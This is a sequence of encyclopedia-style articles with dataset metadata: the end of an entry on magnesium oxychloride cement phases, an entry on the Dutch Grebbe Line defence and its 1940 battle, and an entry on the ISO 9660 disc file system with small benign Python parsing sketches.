9Mg(OH)2·MgCl2·5H2O ("phase 9", "9:1:5")
MgCl2·6H2O (magnesium chloride hexahydrate)

Phase 3 and phase 5 may exist at ambient temperature, whereas phase 2 and phase 9 are stable only at temperatures above 100 °C. All these compounds are colorless crystalline solids. At ambient temperature, there are also gel-like homogeneous phases that form initially when the reagents are mixed, and eventually crystallize as phase 5, phase 3, or mixtures with Mg(OH)2 or MgCl2·6H2O.

There are also other lower hydrates that can be obtained by heating the "natural" phases:

2Mg(OH)2·MgCl2·2H2O (phase 2 dihydrate; ~230 °C)
3Mg(OH)2·MgCl2·5H2O (phase 3 pentahydrate; ~110 °C)
3Mg(OH)2·MgCl2·4H2O (phase 3 tetrahydrate; ~140 °C)
5Mg(OH)2·MgCl2·4H2O (phase 5 tetrahydrate; ~120 °C)
5Mg(OH)2·MgCl2·3H2O (phase 5 trihydrate; ~150 °C)
9Mg(OH)2·MgCl2·2H2O (phase 9 dihydrate; ~190 °C)

In addition, a heptahydrate of phase 5, 5Mg(OH)2·MgCl2·7H2O, can be obtained by washing the natural octahydrate with ethanol. All four stable phases have anhydrous versions, such as 3Mg(OH)2·MgCl2 (anhydrous phase 3) and 5Mg(OH)2·MgCl2 (anhydrous phase 5), with the crystal structure of Mg(OH)2. They can be obtained by heating to about 230 °C (phases 3 and 5), about 320 °C (phase 2), and about 260 °C (phase 9).

History

These compounds are the primary components of matured magnesia cement, invented in 1867 by the French chemist Stanislas Sorel. In the late 19th century, several attempts were made to determine the composition of set Sorel's cement, but the results were not conclusive. Phase 3 was properly isolated and described by Robinson and Waggaman in 1909, and phase 5 was identified by Lukens in 1932.

Properties

Solubility

The oxychlorides are only very slightly soluble in water. In the system MgO – MgCl2 – H2O at about 23 °C, the completely liquid region has vertices at the following triple equilibrium points (as mass fractions, not molar fractions):

S1 = (solution : Mg(OH)2 : phase 5)
S2 = (solution : phase 5 : phase 3)
S3 = (solution : phase 3 : MgCl2·6H2O)

The other vertices are pure water, magnesium chloride hexahydrate, and the saturated solution ( by mass).

Decomposition and degradation

The anhydrous forms decompose when heated above 450-500 °C through decomposition of the hydroxide and chloride anions, releasing water and hydrogen chloride and leaving a magnesium oxide residue. Extended exposure of magnesium oxychlorides to water leaches out the soluble magnesium chloride, leaving hydrated brucite Mg(OH)2. On exposure to the atmosphere, the oxychlorides slowly react with carbon dioxide from the air to form magnesium chlorocarbonates. Anhydrous and partially hydrated forms also absorb water, turning into phase 5 and then phase 3 on the way to the chlorocarbonate. The exceptions are the dihydrate and hexahydrate of phase 9, which remain unchanged for many months.

Structure

The crystal structure of phase 3 is triclinic, with z = 2. The solid consists of polymeric aquohydroxo cations, in the form of double chains of magnesium atoms surrounded and bridged by the oxygen atoms of hydroxy groups and complexed water molecules.
These linear cations are interleaved and neutralized by chloride anions and some unbound water molecules, yielding the general formula Mg2(OH)3Cl·4H2O. The structure of phase 5 is believed to be similar, with generic formula Mg3(OH)5Cl·4H2O. The anhydrous forms of phase 3 and phase 5 have the same structure as Mg(OH)2: namely, layers of magnesium cations, each sandwiched between two layers of hydroxy or chloride anions. Phase 5 crystals form as long needles consisting of rolled-up sheets.

The Raman spectrum of phase 3 has peaks at 3639 and 3657 cm−1, whereas phase 5 has peaks at 3608 and 3691 cm−1, and brucite has a peak at 3650 cm−1. These peaks are attributed to stretching vibrations of the OH groups. Phase 3 also has a peak at 451 cm−1, attributed to the stretching of Mg–O bonds.

Preparation

From MgO or Mg(OH)2 and MgCl2

Phases 3 and 5 can be prepared by mixing powdered magnesium oxide MgO with a solution of magnesium chloride MgCl2 in water, in molar ratios MgO : MgCl2 : H2O of 3:1:11 and 5:1:13, respectively, at room temperature. This is the common method of preparing Sorel magnesia cement. Magnesium hydroxide can also be used instead of the oxide, with an adjusted amount of water. For best results, the magnesium oxide should have small particle size and large surface area. It can be prepared by calcination of magnesium hydroxycarbonate at about 600 °C. Higher temperatures increase particle size, leading to a slower reaction rate.

It is believed that, during the reaction, the magnesium oxide is continuously hydrated and dissolved, helped by the slightly acidic character of the magnesium chloride solution. The acidity is attributed to hydrolysis of the magnesium hexahydrate cations:

[Mg(H2O)6]2+ ⇌ [Mg(H2O)5(OH)]+ + H+

The protons (which are actually hydrated, e.g. as H3O+) make the solution acidic; the pH varies from 6.5 to 4.7 as the concentration of MgCl2 increases from 30% to 70% (weight basis). The protons then react with and dissolve the nearly insoluble oxide or hydroxide, by such reactions as

MgO + 2 H+ → Mg2+ + H2O

The magnesium and hydroxide ions in solution then combine into complex cations with multiple magnesium atoms, bridged by hydroxide anions and water molecules (magnesium aquohydroxo complexes). This process involves additional hydrolysis, turning some H2O ligands into OH− and freeing more H+, which keeps dissolving more oxide. With enough magnesium chloride, the dissolution of the oxide is relatively fast, and a clear solution of magnesium aquohydroxo cations can be obtained by filtration.

Over a period of several hours, those cations keep combining into larger complexes, becoming less soluble as they grow. After a few hours (at room temperature), those cations and the chloride anions precipitate as (or turn the solution into) a hydrogel, which then gradually crystallizes into a mixture of phase 3, phase 5, solid magnesium oxide and/or chloride, and/or some residual solution. Depending on the proportions of the reagents, phase 5 may form at first, but then react with excess chloride to form phase 3. The magnesium oxide can also react with water to form the hydroxide which, being poorly soluble, would coat the oxide grains and stop further hydration. The acidity provided by hydrolysis of the cations in solution dissolves this coating, and thus allows the process to run continuously until one of the reagents is exhausted.

From MgO or Mg(OH)2 and HCl

The compounds can also be prepared from magnesium oxide or hydroxide and hydrochloric acid. The MgO – MgCl2 – H2O phase diagram is contained in the MgO – H2O – HCl diagram.
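As a worked arithmetic sketch of the 3:1:11 batching described above, in Python (the 0.5 mol basis is an invented example quantity; using the hexahydrate as the chloride source is one common choice, its six waters of crystallization counting toward the 11 moles of water):

M_MgO = 40.30            # g/mol
M_MgCl2_6H2O = 203.30    # g/mol
M_H2O = 18.02            # g/mol

basis = 0.5              # moles of MgCl2 chosen as the batch basis (hypothetical)

m_MgO = 3 * basis * M_MgO
m_hexahydrate = 1 * basis * M_MgCl2_6H2O
m_added_water = (11 - 6) * basis * M_H2O   # 6 mol H2O already in the hexahydrate

print(f"MgO: {m_MgO:.1f} g, MgCl2·6H2O: {m_hexahydrate:.1f} g, "
      f"added water: {m_added_water:.1f} g")

For this basis the batch works out to roughly 60 g of MgO, 102 g of hexahydrate, and 45 g of added water, preserving the 3:1:11 molar proportions.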
From MgCl2 and NaOH

The difficulties of preparing the magnesium oxide and ensuring its full reaction can be avoided by using NaOH instead of MgO or Mg(OH)2, so that all reagents are solutions. However, sodium chloride NaCl may also precipitate at certain concentrations of the reagents. By this route, stable phase 5 precipitates in a rather narrow range of conditions, namely when the concentration [Cl] of chloride anions in solution is 2.02 ± 0.03 mol/L, the concentration [Mg] of magnesium (as Mg2+ and other cations) is 1.78 ± 0.07 mol/L, and the pH is 7.65 ± 0.05. Stable phase 3 precipitates in a broader range of cases, namely when [Cl] is 6.48 ± 2.17 mol/L, [Mg] is 3.14 ± 1.12 mol/L, and the pH is 6.26 ± 0.14.

Other

A short note from 1872 reported the formation of a solid with approximate formula , as a mass of fine needles, from a solution of magnesium ammonium chloride with excess ammonia left standing for several months. G. André claimed in 1882 the preparation of anhydrous oxychlorides by fusing anhydrous magnesium chloride with powdered magnesium oxide.

References

Magnesium compounds Chlorides Oxides Metal halides Oxychlorides
Magnesium hydroxychloride
Chemistry
1,936
6,354,416
https://en.wikipedia.org/wiki/Grebbe%20Line
The Grebbe Line (Dutch: Grebbelinie) was a forward defence line of the Dutch Water Line, based on inundation. The Grebbe Line ran from the Grebbeberg in Rhenen northwards to the IJsselmeer.

Early history and first decommissioning

The Grebbe Line was first established in 1745 as a line of defense to protect the Netherlands from invading armies. If an invasion was imminent, parts of the area between Spakenburg and the Grebbeberg were to be flooded. Until World War II, it was never actually used for that purpose; an attempt was made in 1794 to establish a defensive line against the invading French army under General Jean-Charles Pichegru, but the joint British-Dutch army abandoned the line when the French troops approached. Throughout the 19th century, the Grebbe Line was maintained as a defensive line. However, since no attacks appeared likely, it was deemed less necessary to maintain the costly fortifications, and in 1926 a large part of the fortifications was decommissioned.

World War II

In 1939 the disused line was once again fortified against a German attack on the Netherlands, but due to cost issues the reinforcements never reached an acceptable level. In the extensive 1939 defence plans, under which the Grebbe Line would have been provided with more extensive and much denser concrete reinforcements, the line would fulfill its old role as a forward line of defence. These plans were never executed, however, overtaken as they were by the events of the German invasion in May 1940.

By that time the Grebbe Line had largely been constructed behind vast inundations, behind which lay a front line composed of classic trench works mixed with ferro- and ferroconcrete bunkers of light and medium grade. The front-line trenches had hardly any depth and contained only half a battalion of infantry per kilometre of line. Behind this front line was a second row of trenches which had the function of blocking defence should the front line be penetrated. Reserves could be thrown in from this line, and behind it were battalion and regimental command posts as well as forward light artillery positions. More to the rear were the medium and heavy artillery positions, as well as divisional reserves.

The Grebbe Line had three weak spots. The first two were near the city of Amersfoort, the third near the village of Rhenen, where the elevated Grebbeberg, a 150-foot-high hill, had made inundation works impossible. These sectors had been additionally fortified: instead of inundations, it had been decided to place forward positions ahead of the main defences. In the meantime a large and bomb-proof pump house had come under construction that, once operable, would be able to flood the area in front of the Grebbeberg after all. This counter-measure, too, came too late. That left the Grebbeberg as a very vulnerable position in the entire Grebbe Line, which had not gone unnoticed by the attackers-to-be.

The Germans had extensively studied the battlegrounds that they were to use in May 1940. Well ahead of the actual invasion, German army staff officers managed to visit the Grebbe Line in civilian clothes, carefully studying the actual threats and opportunities. The Rhenen area, close to the Rhine river, drew particular notice: it was the shortest distance from German soil and seemed to be a weak spot in the Dutch defence line. The 207th Infantry Division chose to place its most formidable push at this point, for which it also had the motorized SS regiment Der Führer at its disposal.
The adjacent 227th Infantry Division, accompanied by the motorized SS Leibstandarte 'Adolf Hitler', had a less defined picture of the plans ahead. It chose to decide where to attack during the operation instead of before. In May 1940, the two German divisions, together with their respective SS regiments and additional heavy artillery regiments, had little trouble overcoming the first obstacles and managed to reach the Grebbe Line on the second day, although the 227th Division would need more time, meeting more Dutch resistance on the way. The 207th Division was supported by five artillery battalions and spearheaded by the fanatical SS Regiment Der Führer. The latter had first raided the Arnhem fortifications near Westervoort and subsequently massed in the city of Wageningen opposite the Grebbe Line. On the second day the SS regiment managed to take the forward defences, although it took them all day and their losses mounted considerably. On the third day they managed to penetrate the front line near the Grebbeberg itself, fighting the rest of the day and evening to widen the gap. The SS was blocked by the last Dutch defence line, however, causing the commander of the 207th Division to move in his own division and shift SS Der Führer away to the north of the Grebbeberg. The SS regiment had by then suffered severe losses; its third battalion was out of action entirely. Overnight the Dutch planned a major counterattack by four infantry battalions, an operation that was poorly executed and that moreover collided with an SS assault along the northern perimeter of the Grebbeberg defences at midday on the fourth day of the invasion. German dive bombers sealed the fate of both the Dutch counterattack and the local defences. The 207th Division's assaults over the Grebbeberg itself had also been successful, although it absorbed severe losses. By the end of the day the German infantry stood in the village of Rhenen. Around nightfall the Germans realized that the Dutch defences had pulled back. A quick reaction force of motorized SS units was formed, but it would not manage to overtake the Dutch forces, which had also left one or two blocking parties behind to slow any pursuers. The battle of the Grebbeberg had cost 420 Dutch and around 250 German soldiers killed in action; the numbers wounded were roughly four times higher. The Dutch also lost thousands of men as prisoners of war, as well as a great deal of matériel and artillery pieces. The second major battle during the German invasion took place near Scherpenzeel. The 227th Infantry Division had been slowed down by continuing Dutch cavalry efforts to counter its approach. Moreover, the SS Leibstandarte had been called off on the third day and instructed to redeploy to the south of the Netherlands, where it was to push on alongside the 9th Panzer Division. The 227th was on its own from then on and decided to attack the Grebbe Line near Scherpenzeel. This was a poor choice of battlefield by the German divisional commander. The defences made a sharp curve at this point, forming a right-angled salient. It was exactly at this point that two German infantry regiments chose to assault the defences. By doing so they positioned themselves such that they were exposed to defensive fire from fixed positions and trenches, as well as artillery, along two-thirds of their front and flank. This basic offensive failure led to a costly German defeat. Overnight the most advanced of the pinned-down German attackers managed to crawl back to their own lines.
The 227th had lost 70 men killed in action in this effort, most of them from the 412th Regiment. Overnight Dutch artillery unleashed a heavy barrage on the suspected German positions, gradually reducing the density of fire, which finally ceased shortly before dawn. The German command was quite awed by this show of force and had anticipated heavy fighting in the morning, but much to its surprise found the Dutch trenches deserted by morning. Behind the mask of the barrages the entire defence had withdrawn overnight. Pursuit came much too late to overtake any Dutch formation before it had reached the next defences. Directly after the cessation of hostilities a large war cemetery was established on top of the Grebbeberg. German and Dutch victims of the battle were the first to be buried at this location, but during the war the Germans would use and extend this burial ground further as their death toll rose. After the war the Dutch reburied the German victims at the collective German war cemetery in Ysselsteyn, where over 30,000 Germans were buried. The Grebbeberg war cemetery now holds around 800 Dutch victims of the fighting of May 1940, as well as a few of later (wartime) date. The Grebbe Line was permanently decommissioned by the Dutch Government in 1951. Pantherstellung During the war, the Germans made use of the Grebbe Line to create their own defence line, the Pantherstellung. On 26 October 1944 General Walter Model initiated the building of the Pantherstellung. At the time, it was clear that the enemy would come not from the west but from the south. The Germans wanted to hold the Holland region because of the V-2 rocket attacks on London: they did not want to lose the ability to fire the rockets, and they wanted to prevent the Allies from reaching the IJsselmeer. The Germans had to make some changes to the design because the threat was expected from the south. From Veenendaal to Amersfoort, the defence line had the same configuration as the Grebbe Line. See also Dutch waterlines Defence Line of Amsterdam Hollandic Water Line IJssel Line Maas Line Peel-Raam Line Other Defence lines of the Netherlands References Grebbelinie website Website commemorating the World War II Battle of the Grebbeberg War over Holland (in English) Military history of the Netherlands World War II defensive lines Netherlands in World War II World War II sites in the Netherlands History of Gelderland History of Utrecht (province)
Grebbe Line
Engineering
1,959
15,145
https://en.wikipedia.org/wiki/ISO%209660
ISO 9660 (also known as ECMA-119) is a file system for optical disc media. The file system is an international standard available from the International Organization for Standardization (ISO). Since the specification is available for anybody to purchase, implementations have been written for many operating systems. ISO 9660 traces its roots to the High Sierra Format, which arranged file information in a dense, sequential layout to minimize nonsequential access by using a hierarchical (eight levels of directories deep) tree file system arrangement, similar to UNIX and FAT. To facilitate cross-platform compatibility, it defined a minimal set of common file attributes (directory or ordinary file and time of recording) and name attributes (name, extension, and version), and used a separate system use area where future optional extensions for each file may be specified. High Sierra was adopted in December 1986 (with changes) as an international standard by Ecma International as ECMA-119 and submitted for fast tracking to the ISO, where it was eventually accepted as ISO 9660:1988. Subsequent amendments to the standard were published in 2013 and 2020. The first 16 sectors of the file system are empty and reserved for other uses. The rest begins with a volume descriptor set (a header block which describes the subsequent layout) and then the path tables, directories and files on the disc. An ISO 9660 compliant disc must contain at least one primary volume descriptor describing the file system and a volume descriptor set terminator, which is a volume descriptor that marks the end of the descriptor set. The primary volume descriptor provides information about the volume, characteristics and metadata, including a root directory record that indicates in which sector the root directory is located. Other fields contain metadata such as the volume's name and creator, along with the size and number of logical blocks used by the file system. Path tables summarize the directory structure of the relevant directory hierarchy. For each directory in the image, the path table provides the directory identifier, the location of the extent in which the directory is recorded, the length of any extended attributes associated with the directory, and the index of its parent directory path table entry. There are several extensions to ISO 9660 that relax some of its limitations. Notable examples include Rock Ridge (Unix-style permissions and longer names), Joliet (Unicode, allowing non-Latin scripts to be used), El Torito (enables CDs to be bootable) and the Apple ISO 9660 Extensions (file characteristics specific to the classic Mac OS and macOS, such as resource forks, file backup date and more). History Compact discs were originally developed for recording musical data, but soon were used for storing additional digital data types because they were equally effective for archival mass data storage. Called CD-ROMs, the lowest-level format for this type of compact disc was defined in the Yellow Book specification in 1983. However, this book did not define any format for organizing data on CD-ROMs into logical units such as files, which led to every CD-ROM maker creating its own format. In order to develop a CD-ROM file system standard (Z39.60 - Volume and File Structure of CDROM for Information Interchange), the National Information Standards Organization (NISO) set up Standards Committee SC EE (Compact Disc Data Format) in July 1985.
In September/October 1985 several companies invited experts to participate in the development of a working paper for such a standard. In November 1985, representatives of computer hardware manufacturers gathered at the High Sierra Hotel and Casino (currently called the Golden Nugget Lake Tahoe) in Stateline, Nevada. This group became known as the High Sierra Group (HSG). Present at the meeting were representatives from Apple Computer, AT&T, Digital Equipment Corporation (DEC), Hitachi, LaserData, Microware, Microsoft, 3M, Philips, Reference Technology Inc., Sony Corporation, TMS Inc., VideoTools (later Meridian), Xebec, and Yelick. The meeting report evolved from the Yellow Book CD-ROM standard, which was so open-ended that it was leading to diversification and the creation of many incompatible data storage methods. The High Sierra Group Proposal (HSGP) was released in May 1986, defining a file system for CD-ROMs commonly known as the High Sierra Format. A draft version of this proposal was submitted to the European Computer Manufacturers Association (ECMA) for standardization. With some changes, this led to the issue of the initial edition of the ECMA-119 standard in December 1986. The ECMA submitted their standard to the International Organization for Standardization (ISO) for fast tracking, where it was further refined into the ISO 9660 standard. For compatibility the second edition of ECMA-119 was revised to be equivalent to ISO 9660 in December 1987. ISO 9660:1988 was published in 1988. The main changes from the High Sierra Format in the ECMA-119 and ISO 9660 standards were international extensions to allow the format to work better on non-US markets. In order not to create incompatibilities, NISO suspended further work on Z39.60, which had been adopted by NISO members on 28 May 1987. It was withdrawn before final approval, in favour of ISO 9660. JIS X 0606:1998 was passed in Japan in 1998 with much-relaxed file name rules using a new "enhanced volume descriptor" data structure. The standard was submitted for ISO 9660:1999 and supposedly fast-tracked, but nothing came of it. Nevertheless, several operating systems and disc authoring tools (such as Nero Burning ROM, mkisofs and ImgBurn) now support the addition, under such names as "ISO 9660:1999", "ISO 9660 v2", or "ISO 9660 Level 4". In 2013, the proposal was finally formalized in the form of ISO 9660/Amendment 1, intended to "bring harmonization between ISO 9660 and widely used 'Joliet Specification'." In December 2017, a 3rd Edition of ECMA-119 was published that is technically identical with ISO 9660, Amendment 1. In 2019, ECMA published a 4th edition of ECMA-119, integrating the Joliet text as "Annex C". In 2020, ISO published Amendment 2, which adds some minor clarifying matter, but does not add or correct any technical information of the standard. Specifications The following is the rough overall structure of the ISO 9660 file system. Multi-byte values can be stored in three different formats: little-endian, big-endian, and in a concatenation of both types in what the specification calls "both-byte" order. Both-byte order is required in several fields in the volume descriptors and directory records, while path tables can be either little-endian or big-endian. Top level The system area, the first 32,768 data bytes of the disc (16 sectors of 2,048 bytes each), is unused by ISO 9660 and therefore available for other uses. While it is suggested that they are reserved for use by bootable media, a CD-ROM may contain an alternative file system descriptor in this area, and it is often used by hybrid CDs to offer classic Mac OS-specific and macOS-specific content.
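The "both-byte" encoding and the fixed 32 KiB system area described above can be made concrete with a short sketch. The following Python fragment is illustrative only; the constant and function names are invented for this example:

```python
import struct

SECTOR_SIZE = 2048          # logical sector size used by ISO 9660
SYSTEM_AREA_SECTORS = 16    # sectors 0-15 form the unused system area

def read_both_byte_u32(field: bytes) -> int:
    """Decode an 8-byte "both-byte" field: the same 32-bit value stored
    little-endian first, then big-endian; the two halves should agree."""
    little = struct.unpack("<I", field[:4])[0]
    big = struct.unpack(">I", field[4:8])[0]
    if little != big:
        raise ValueError("both-byte halves disagree; the image may be corrupt")
    return little

# The volume descriptor set begins immediately after the system area:
VOLUME_DESCRIPTOR_OFFSET = SYSTEM_AREA_SECTORS * SECTOR_SIZE  # byte 32,768
```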
Volume descriptor set The data area begins with the volume descriptor set, a set of one or more volume descriptors terminated with a volume descriptor set terminator. These collectively act as a header for the data area, describing its content (similar to the BIOS parameter block used by FAT, HPFS and NTFS formatted disks). Each volume descriptor is 2048 bytes in size, fitting perfectly into a single Mode 1 or Mode 2 Form 1 sector. Each descriptor begins with a one-byte type code, the five-byte standard identifier "CD001" and a one-byte version number, followed by 2,041 bytes of type-dependent data. The data field of a volume descriptor may be subdivided into several fields, with the exact content depending on the type. Redundant copies of each volume descriptor can also be included in case the first copy of the descriptor becomes corrupt. The standard volume descriptor types are the boot record (type 0), the primary volume descriptor (type 1), the supplementary or enhanced volume descriptor (type 2), the volume partition descriptor (type 3) and the volume descriptor set terminator (type 255). An ISO 9660 compliant disc must contain at least one primary volume descriptor describing the file system and a volume descriptor set terminator for indicating the end of the descriptor sequence. The volume descriptor set terminator is simply a particular type of volume descriptor with the purpose of marking the end of this set of structures. The primary volume descriptor provides information about the volume, characteristics and metadata, including a root directory record that indicates in which sector the root directory is located. Other fields contain the description or name of the volume, and information about who created it and with which application. The size of the logical blocks which the file system uses to segment the volume is also stored in a field inside the primary volume descriptor, as well as the amount of space occupied by the volume (measured in number of logical blocks). In addition to the primary volume descriptor(s), supplementary volume descriptors or enhanced volume descriptors may be present. Supplementary volume descriptors describe the same volume as the primary volume descriptor does, and are normally used for providing additional code page support when the standard code tables are insufficient. The standard specifies that ISO 2022 is used for managing code sets that are wider than 8 bits, and that ISO 2375 escape sequences are used to identify each particular code page used. Consequently, ISO 9660 supports international single-byte and multi-byte character sets, provided they fit into the framework of the referenced standards. However, ISO 9660 does not specify any code pages that are guaranteed to be supported: all use of code tables other than those defined in the standard itself are subject to agreement between the originator and the recipient of the volume. Enhanced volume descriptors were introduced in ISO 9660, Amendment 1. They relax some of the requirements of the other volume descriptors and the directory records referenced by them: for example, the directory depth can exceed eight, file identifiers need not contain '.' or a file version number, and the length of a file or directory identifier may be up to 207 bytes.
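The descriptor layout described above (a type byte, the identifier "CD001", a version byte, then type-dependent data, repeated sector by sector until the set terminator) can be illustrated with a minimal Python sketch. It assumes an uncompressed .iso image and performs no error recovery; the file name example.iso is a placeholder:

```python
SECTOR_SIZE = 2048

def walk_volume_descriptors(path: str):
    """Yield (type, sector) for each volume descriptor until the
    set terminator (type 255) is reached. Sketch only."""
    with open(path, "rb") as image:
        image.seek(16 * SECTOR_SIZE)               # skip the system area
        while True:
            sector = image.read(SECTOR_SIZE)
            if len(sector) < SECTOR_SIZE or sector[1:6] != b"CD001":
                break                              # not a valid descriptor
            vd_type = sector[0]                    # 1 = primary, 2 = supplementary
            yield vd_type, sector
            if vd_type == 255:                     # volume descriptor set terminator
                break

# Example: print the volume identifier from the primary volume descriptor
# (d-characters stored at offsets 40-71 of the descriptor).
for vd_type, sector in walk_volume_descriptors("example.iso"):
    if vd_type == 1:
        print(sector[40:72].decode("ascii").rstrip())
```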
Path tables Path tables summarize the directory structure of the relevant directory hierarchy. For each directory in the image, the path table provides the directory identifier, the location of the extent in which the directory is recorded, the length of any extended attributes associated with the directory, and the index of its parent directory path table entry. The parent directory number is a 16-bit number, limiting its range from 1 to 65,535. Directories and files Directory entries are stored following the location of the root directory entry, where evaluation of filenames is begun. Both directories and files are stored as extents, which are sequential series of sectors. Files and directories are differentiated only by a file attribute that indicates their nature (similar to Unix). The attributes of a file are stored in the directory entry that describes the file, and optionally in the extended attribute record. To locate a file, the directory names in the file's path can be checked sequentially, going to the location of each directory to obtain the location of the subsequent subdirectory. However, a file can also be located through the path table provided by the file system. This path table stores information about each directory, its parent, and its location on disc. Since the path table is stored in a contiguous region, it can be searched much faster than jumping to the particular locations of each directory in the file's path, thus reducing seek time. The standard specifies three nested levels of interchange (paraphrased from section 10): Level 1: File names are limited to eight characters with a three-character extension. Directory names are limited to eight characters. Files may contain one single file section. Level 2: File Name + '.' + File Name Extension or Directory Name may not exceed 31 characters in length (sections 7.5 and 7.6). Files may contain one single file section. Level 3: No restrictions beyond those stipulated in the main body of the standard. Files are also allowed to consist of multiple non-contiguous sections (with some restrictions as to order). Additional restrictions in the body of the standard: the depth of the directory hierarchy must not exceed 8 (the root directory being at level 1), and the path length of any file must not exceed 255 (section 6.8.2.1). The standard also specifies the following name restrictions (sections 7.5 and 7.6): All levels restrict file names in the mandatory file hierarchy to upper-case letters, digits, underscores ("_"), and a dot (see also section 7.4.4 and Annex A). If no characters are specified for the File Name then the File Name Extension shall consist of at least one character. If no characters are specified for the File Name Extension then the File Name shall consist of at least one character. File names shall not have more than one dot. Directory names shall not use dots at all. A CD-ROM producer may choose one of the lower levels of interchange specified in chapter 10 of the standard, and further restrict file name length from 30 characters to only 8+3 in file identifiers, and 8 in directory identifiers, in order to promote interchangeability with implementations that do not implement the full standard. All numbers in ISO 9660 file systems except the single byte value used for the GMT offset are unsigned numbers.
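The naming rules of sections 7.5 and 7.6 summarized above can be checked mechanically. The following Python sketch is illustrative and deliberately simplified; see the comments for a corner case it ignores:

```python
import re

# d-characters allowed in strict ISO 9660 identifiers: A-Z, 0-9, underscore.
FILE_ID = re.compile(r"[A-Z0-9_]{1,8}(\.[A-Z0-9_]{1,3})?(;[0-9]+)?")
DIR_ID = re.compile(r"[A-Z0-9_]{1,8}")

def is_level1_identifier(name: str, is_directory: bool = False) -> bool:
    """Check one identifier against the Level 1 rules paraphrased above:
    8.3 names (plus an optional ";version") for files, at most eight
    characters and no dot for directories. Simplified: the corner case of
    an empty file name with a non-empty extension is not handled."""
    pattern = DIR_ID if is_directory else FILE_ID
    return pattern.fullmatch(name) is not None

assert is_level1_identifier("README.TXT;1")
assert not is_level1_identifier("lowercase.txt")  # lower case is not allowed
assert not is_level1_identifier("TWO.DOT.S")      # more than one dot
```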
As the length of a file's extent on disc is stored in a 32-bit value, the format allows for a maximum file section length of just over 4.2 GB (more precisely, one byte less than 4 GiB). It is possible to circumvent this limitation by using the multi-extent (fragmentation) feature of ISO 9660 Level 3 to create ISO 9660 file systems and single files up to 8 TB. With this, files larger than 4 GiB can be split up into multiple extents (sequential series of sectors), each not exceeding the 4 GiB limit. For example, free software such as InfraRecorder, ImgBurn and mkisofs, as well as Roxio Toast, are able to create ISO 9660 file systems that use multi-extent files to store files larger than 4 GiB on appropriate media such as recordable DVDs. Linux supports multiple extents. Since Amendment 1 (or ECMA-119 3rd edition, or "JIS X 0606:1998 / ISO 9660:1999"), a much wider variety of file trees can be expressed by the enhanced volume descriptor system. There is no longer any character limit (even 8-bit characters are allowed), nor any depth limit or path length limit. There is still a limit on name length, at 207 bytes. The character set is no longer enforced, so both sides of the disc interchange need to agree on it via a different channel. Extensions and improvements There are several extensions to ISO 9660 that relax some of its limitations. Notable examples include Rock Ridge (Unix-style permissions and longer names), Joliet (Unicode, allowing non-Latin scripts to be used), El Torito (enables CDs to be bootable) and the Apple ISO 9660 Extensions (file characteristics specific to the classic Mac OS and macOS, such as resource forks, file backup date and more). SUSP System Use Sharing Protocol (SUSP, IEEE P1281) provides a generic way of including additional properties for any directory entry reachable from the primary volume descriptor (PVD). In an ISO 9660 volume, every directory entry has an optional system use area whose contents are undefined and left to be interpreted by the system. SUSP defines a method to subdivide that area into multiple system use fields, each identified by a two-character signature tag. The idea behind SUSP was that it would enable any number of independent extensions to ISO 9660 to be created and included on a volume without conflicting. It also allows for the inclusion of property data that would otherwise be too large to fit within the limits of the system use area. SUSP defines several common tags and system use fields: CE: Continuation area PD: Padding field SP: System use sharing protocol indicator ST: System use sharing protocol terminator ER: Extensions reference ES: Extension selector Other known SUSP fields include: AA: Apple extension, preferred BA: Apple extension, old (length attribute is missing) AS: Amiga file properties ZF: zisofs compressed file, usually produced by the program mkzftree or by libisofs, and transparently decompressed by the Linux kernel if built with CONFIG_ZISOFS AL: Extended File Attributes, including ACLs; proposed by libburnia, supported by libisofs The Apple extensions do not technically follow the SUSP standard; however, the basic structure of the AA and BA fields defined by Apple is forward compatible with SUSP, so that, with care, a volume can use both the Apple extensions and the RRIP extensions.
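The signature-tagged field structure that SUSP gives the system use area, as described above, can be sketched as follows. This is a minimal illustration assuming the usual SUSP field header (two-byte signature, one-byte total length, one-byte version), not a complete implementation:

```python
def iter_susp_fields(system_use: bytes):
    """Split a directory record's system use area into SUSP fields.
    Assumed layout per field: 2-byte signature, 1-byte total length,
    1-byte version, then (length - 4) bytes of payload."""
    pos = 0
    while pos + 4 <= len(system_use):
        signature = system_use[pos:pos + 2].decode("ascii", "replace")
        length = system_use[pos + 2]
        if length < 4 or pos + length > len(system_use):
            break                      # padding or a malformed field: stop
        yield signature, system_use[pos + 4:pos + length]
        if signature == "ST":          # SUSP terminator field
            break
        pos += length
```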
Rock Ridge The Rock Ridge Interchange Protocol (RRIP, IEEE P1282) is an extension which adds POSIX file system semantics. The availability of these extension properties allows for better integration with Unix and Unix-like operating systems. The standard takes its name from the fictional town Rock Ridge in Mel Brooks' film Blazing Saddles. The RRIP extensions are, briefly: Longer file names (up to 255 bytes) and fewer restrictions on allowed characters (support for lowercase, etc.) UNIX-style file modes, user ids and group ids, and file timestamps Support for symbolic links and device files Deeper directory hierarchy (more than 8 levels) Efficient storage of sparse files The RRIP extensions are built upon SUSP, defining additional tags for support of POSIX semantics, along with the format and meaning of the corresponding system use fields: RR: Rock Ridge extensions in-use indicator (note: dropped from the standard after version 1.09) PX: POSIX file attributes PN: POSIX device numbers SL: symbolic link NM: alternate name CL: child link PL: parent link RE: relocated directory TF: time stamp SF: sparse file data Amiga Rock Ridge is similar to RRIP, except it provides additional properties used by AmigaOS. It too is built on the SUSP standard, defining an "AS"-tagged system use field; thus both Amiga Rock Ridge and the POSIX RRIP may be used simultaneously on the same volume. Among the specific properties supported by this extension are the additional Amiga bits for files: there is support for attribute "P", which stands for the "pure" bit (indicating a re-entrant command), and attribute "S", for the script bit (indicating a batch file). This includes the protection flags plus an optional comment field. These extensions were introduced by Angela Schmidt with the help of Andrew Young, the primary author of the Rock Ridge Interchange Protocol and System Use Sharing Protocol. The first publicly available software to master a CD-ROM with Amiga extensions was MakeCD, Amiga software which Angela Schmidt developed together with Patrick Ohly. El Torito El Torito is an extension designed to allow booting a computer from a CD-ROM. It was announced in November 1994 and first issued in January 1995 as a joint proposal by IBM and BIOS manufacturer Phoenix Technologies. According to legend, the El Torito CD/DVD extension to ISO 9660 got its name because its design originated in an El Torito restaurant in Irvine, California. The initial two authors were Curtis Stevens, of Phoenix Technologies, and Stan Merkin, of IBM. A 32-bit PC BIOS will search for boot code on an ISO 9660 CD-ROM. The standard allows for booting in two different modes: either in hard disk emulation, where the boot information can be accessed directly from the CD media, or in floppy emulation mode, where the boot information is stored in an image file of a floppy disk, which is loaded from the CD and then behaves as a virtual floppy disk. This is useful for computers that were designed to boot only from a floppy drive. For modern computers the "no emulation" mode is generally the more reliable method. The BIOS will assign a BIOS 